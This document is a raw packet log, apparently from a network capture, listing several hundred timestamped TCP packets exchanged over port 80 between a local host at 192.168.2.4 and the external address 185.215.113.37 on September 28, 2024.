Sep 28, 2024 21:26:18.529349089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529377937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529388905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529397964 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529407024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529429913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529459000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529588938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529601097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529609919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529620886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529633045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529637098 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529644012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529656887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529659986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529676914 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529726028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529882908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529892921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529907942 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529917002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529930115 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529932022 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529942036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.529973984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.529973984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530065060 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530184984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530195951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530205011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530215025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530225992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530235052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530239105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530251026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530251980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530263901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530272007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530281067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530293941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530294895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530311108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530339956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530539989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530550003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530560017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530569077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530584097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530585051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530596018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530607939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530610085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530620098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530647993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530647993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530680895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530868053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530879974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530889034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530900002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530911922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530911922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530925035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530932903 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530937910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530952930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.530966997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530998945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.530998945 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531193018 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531203985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531213999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531239033 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531270027 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531341076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531352997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531363010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531373024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531388998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531399965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531404018 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531404018 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531411886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531423092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531424046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531434059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531446934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531451941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531464100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531476021 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531478882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.531519890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531519890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.531519890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532013893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532025099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532035112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532044888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532057047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532066107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532068014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532080889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532095909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532104015 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532108068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532119989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532130957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532131910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532130957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532145977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532157898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532159090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532191038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532216072 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532636881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532649040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532659054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532670021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532682896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532682896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532694101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532705069 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532707930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532715082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532727003 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532737017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532748938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532748938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532748938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532763004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532768965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532774925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532787085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532788038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532799006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532804966 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532809973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532820940 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532826900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532840014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.532845020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532861948 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.532877922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533354044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533365011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533375025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533384085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533394098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533405066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533406019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533416033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533427000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533437967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533448935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533449888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533449888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533461094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533469915 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533473015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533484936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533489943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533495903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533509970 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533514023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533521891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533534050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533535004 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533546925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.533556938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533579111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.533608913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534029961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534040928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534051895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534060955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534070969 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534095049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534095049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534111977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534118891 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534123898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534136057 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534147978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534157991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534164906 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534169912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534181118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534193039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.534200907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534200907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534219980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.534248114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621542931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621567011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621578932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621603012 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621644020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621676922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621690035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621726990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621764898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621778011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621809959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621841908 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621917963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621931076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621942043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621953964 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621964931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.621972084 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.621978045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622004032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.622028112 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.622172117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622184038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622194052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622220039 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.622248888 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.622278929 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622292995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622303963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622312069 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.622327089 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.622363091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.622363091 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.653551102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653619051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.653620958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653634071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653645039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653685093 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.653685093 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.653806925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653817892 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653827906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653839111 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653850079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.653862000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.653902054 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654092073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654103041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654113054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654123068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654145956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654156923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654166937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654166937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654166937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654180050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654195070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654196024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654225111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654254913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654438019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654449940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654460907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654472113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654484034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654494047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654495001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654509068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654515982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654520988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654535055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654536963 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654556990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654594898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654882908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654895067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654903889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654916048 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654927015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654937983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654947042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654947042 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654949903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654963017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654973030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.654978991 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.654990911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655025959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655026913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655061007 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655230999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655241966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655282974 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655303001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655316114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655324936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655337095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655348063 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655359030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655369043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655369043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655419111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655419111 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655633926 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655667067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655678034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655689001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655689955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655700922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655713081 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655715942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655716896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655725002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655738115 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655740023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655766964 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655783892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.655940056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.655985117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656071901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656102896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656115055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656126976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656138897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656152010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656157970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656157970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656157970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656162024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656176090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656188011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656192064 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656199932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656207085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656213045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656224966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656230927 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:18.656236887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:18.656250954 CEST	80	49732	185.215.113.37	192.168.2.4
